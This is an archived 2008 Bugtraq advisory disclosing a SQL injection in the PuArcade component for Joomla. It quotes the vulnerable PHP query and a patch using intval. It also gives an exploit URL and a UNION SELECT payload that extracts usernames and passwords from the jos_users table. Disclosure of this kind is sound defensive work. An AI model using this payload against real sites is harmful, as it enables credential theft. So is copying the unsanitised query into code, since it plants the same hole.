lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 9 Apr 2008 09:20:31 -0000
From: netmantis.com@...il.com
To: bugtraq@...urityfocus.com
Subject: Pu Arcade component for Joomla - SQL injection

I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .
--------------------------------------------------------------------------------------------------------------------------

Author : MantiS
---------

Vulnerable code :
------------------------
function warningByGame($gid) {
        global $database;
        
        $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
                  . " WHERE g.contentratingid = c.id"
                  . " AND g.id = $gid";
        $database->setQuery($query);
        $cont = $database->loadObjectList();
--------------------------

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]
---------
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .

Patch :
--------
Place before "$query = "SELECT c.id......... " :
$gid = intval($_GET['gid']);
To force $gid variable conversion at an integer .

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ